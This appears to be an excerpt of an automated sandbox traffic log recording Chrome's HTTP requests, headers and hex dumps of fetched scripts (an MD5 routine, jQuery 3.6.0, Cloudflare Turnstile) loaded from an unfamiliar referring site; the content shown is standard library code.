                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1369INData Raw: 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1369INData Raw: 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6192.168.2.449750151.101.66.1374431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC627OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: code.jquery.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://ortkn.lovationyme.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 89501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 2365755
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740066-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache-Hits: 5889, 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Timer: S1728414785.665383,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7192.168.2.449751104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC653OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://ortkn.lovationyme.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:04 UTC356INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              location: /turnstile/v0/b/62ec4f065604/api.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8723428e01809-EWR


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              8192.168.2.449754104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC652OUTGET /turnstile/v0/b/62ec4f065604/api.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://ortkn.lovationyme.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:05 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 47460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              last-modified: Tue, 01 Oct 2024 14:19:56 GMT
